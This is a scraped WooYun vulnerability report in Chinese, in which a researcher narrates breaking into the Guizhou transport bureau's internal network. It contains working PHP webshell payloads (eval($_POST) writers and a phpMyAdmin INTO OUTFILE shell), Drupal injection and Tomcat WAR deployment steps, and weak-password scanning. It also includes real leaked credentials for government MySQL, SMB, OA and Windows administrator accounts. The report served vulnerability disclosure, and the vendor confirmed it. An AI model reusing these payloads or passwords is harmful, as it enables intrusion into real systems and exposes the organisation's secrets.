贵州交通局内网可被成功漫游 | wooyun-2015-0102878| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102878

漏洞标题：贵州交通局内网可被成功漫游

漏洞作者： wilson

提交时间：2015-03-21 21:19

修复时间：2015-05-10 08:22

公开时间：2015-05-10 08:22

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-03-21：细节已通知厂商并且等待厂商处理中
2015-03-26：厂商已经确认，细节仅向厂商公开
2015-04-05：细节向核心白帽子及相关领域专家公开
2015-04-15：细节向普通白帽子公开
2015-04-25：细节向实习白帽子公开
2015-05-10：细节向公众公开

简要描述：

一次简单的内网渗透

详细说明：

一)好久没有动了，和朋友一起玩玩
www.gzjjzd.gov.cn
直接日搞不定
扫描一下端口

Nmap scan report for 222.85.179.17
Host is up (0.067s latency).
Not shown: 976 closed ports
PORT     STATE    SERVICE        VERSION
21/tcp   open     ftp            vsftpd 2.0.8 or later
23/tcp   open     telnet         H3C switch telnetd
80/tcp   open     http           Microsoft IIS httpd
113/tcp  filtered ident
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
199/tcp  filtered smux
445/tcp  filtered microsoft-ds
593/tcp  filtered http-rpc-epmap
801/tcp  filtered device
1023/tcp filtered netvenuechat
1025/tcp filtered NFS-or-IIS
1068/tcp filtered instl_bootc
3389/tcp open     ms-wbt-server  Microsoft Terminal Service
4444/tcp filtered krb524
5000/tcp open     tcpwrapped
5060/tcp open     sip            Brekeke SIP Server rev.286.1 (Status: 100 Trying)
5555/tcp open     freeciv?
7625/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
7627/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
8080/tcp open     http           Apache Tomcat/Coyote JSP engine 1.1
8088/tcp open     http           Microsoft IIS httpd 6.0
8099/tcp open     unknown
8500/tcp filtered fmtp

看到这个:
www.gzjjzd.gov.cn:5333/PMS2_0/?q=user/password
Drupal的注入
教程:drops.wooyun.org/papers/3197
尝试payload
爆出路径:/var/www/PMS2_0/
成功进一个用户名为:owned，密码是thanks的管理员

后台getshell:
教程:qqhack8.blog.163.com/blog/static/11414798520149225199423/
这样可以执行php代码了

如何直接写shell吧
<?php $a="<?php eval($"."_POST[xxs);?>";fputs(fopen("./shell.php","w"),$a);?>

看了看phpinfo()

发现貌似做了端口映射，本机的ip是:192.168.3.206
--------------------========------------------------
二）开始内网遨游
2.1密码收集:
Mysql:

root@gzkl10623777
gz122@gzklgz122
gcvms@123456
phpmyadmin@gzkl10623777
klsms@gzklgz122
kailin_zf@10623777

2.2sscoket 进内网
安装ssocket进内网,教程看着这里:
www.freebuf.com/articles/system/12182.html
好了，开始内网遨游~
这里不急着提权root，看看mysql的密码能不能进root
ok 运气不错进去了

2.3扫描
端口扫描加扫描一下弱口令:

ftp service has:
       ['192.168.3.1:21', '192.168.3.206:21']
Unknown service has:
       ['192.168.3.240:445', '192.168.3.30:80', '192.168.3.32:80', '192.168.3.36:80', '192.168.3.34:80', '192.168.3.35:80', '192.168.3.37:80', '192.168.3.33:80', '192.168.3.31:80', '192.168.3.240:8080', '192.168.3.206:28017']
http service has:
       ['192.168.3.231:80', '192.168.3.66:80', '192.168.3.74:80', '192.168.3.80:80', '192.168.3.107:80', '192.168.3.67:80', '192.168.3.241:80', '192.168.3.215:80', '192.168.3.232:80', '192.168.3.206:27017', '192.168.3.248:80', '192.168.3.206:80', '192.168.3.206:8080', '192.168.3.117:80', '192.168.3.237:80', '192.168.3.95:80', '192.168.3.136:80', '192.168.3.87:80', '192.168.3.70:80', '192.168.3.155:80', '192.168.3.94:80', '192.168.3.236:8080', '192.168.3.78:80', '192.168.3.248:8080', '192.168.3.95:8080', '192.168.3.240:80']
smb service has:
       ['192.168.3.25:445', '192.168.3.95:445', '192.168.3.136:445', '192.168.3.117:445', '192.168.3.253:445', '192.168.3.248:445', '192.168.3.249:445', '192.168.3.28:445']
weaken password:
192.168.3.136 smb at 445 has weaken password!!-------administrator:123
192.168.3.206 mongodb service at 27017 allow login Anonymous login!!

发现一个smb 弱口令和 mongodb的弱口令
想办法执行192.168.3.136的命令:
用pyinstaller给psexec.py 转化为二进制的形式再linux上面执行
但是发现卡着不动了，没成功执行命令。不知道是不是因为win2008的的什么条件设定了？

2.4内网的web渗透
继续看看有没有别web的好玩东西，由于内网管理员防范意识明显减低了~
开始手工测试弱口令~
One:
192.168.3.74 好像是什么voip电话
admin:admin 进去了

Two:
192.168.3.30/Login.htm
admin:12345 进去了
其实也就是这个:
www.gzjjzd.gov.cn:5000/Login.htm
貌似是一个交通摄像头可惜加载不出画面。。

There:
192.168.3.95:8080/index.php?lang=en-iso-8859-1&convcharset=iso-8859-1 phpmyadmin
root:123456 弱口令~
爆出路径：
192.168.3.95:8080/index.php?lang[]=1

SELECT '<?php phpinfo();eval($_POST[a]);?>' INTO OUTFILE 'D:\\host\\phpMyAdmin\\libraries\\test2.php'
ok 成功getshell
再通过 php代理脚本去用菜刀连接内网中的服务器192.168.3.95:
ok~

并找到mssql数据库配置文件，许多数据泄露。。

但是用菜刀不能执行命令？上传大马来提权吧

发现有360提权失败
继续找别的玩玩
Four:
192.168.3.62:99/OAapp/WebObjects/OAapp.woa/wo/com.oa8000.proj.root.Main/W04Vk6bo9HbblLGR3zRrlM/4.14
user:123456 可以进入
华天动力oa 默认密码
www.wooyun.org/bugs/wooyun-2010-072735
默认账号admin/htoa登陆tomcat后台
直接部署一个war getshell
system权限

读密码:
UserName: Administrator
LogonDomain: GZKL-9DE8D3523D
password: 10623777

全程无脱库，只为刷rank。求不抓

漏洞证明：

修复方案：

版权声明：转载请注明来源 wilson@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-03-26 08:21

厂商回复：

CNVD确认并复现所述情况(测试第一层风险),已经转由CNCERT下发给贵州分中心,同时同步向交通部通报中心通报.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102878

漏洞标题：贵州交通局内网可被成功漫游

相关厂商：贵州某部门

漏洞作者： wilson

提交时间：2015-03-21 21:19

修复时间：2015-05-10 08:22

公开时间：2015-05-10 08:22

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wilson@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0102878

漏洞标题：贵州交通局内网可被成功漫游

相关厂商：贵州某部门

漏洞作者： wilson

提交时间：2015-03-21 21:19

修复时间：2015-05-10 08:22

公开时间：2015-05-10 08:22

漏洞类型：成功的入侵事件

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0102878"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 wilson@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：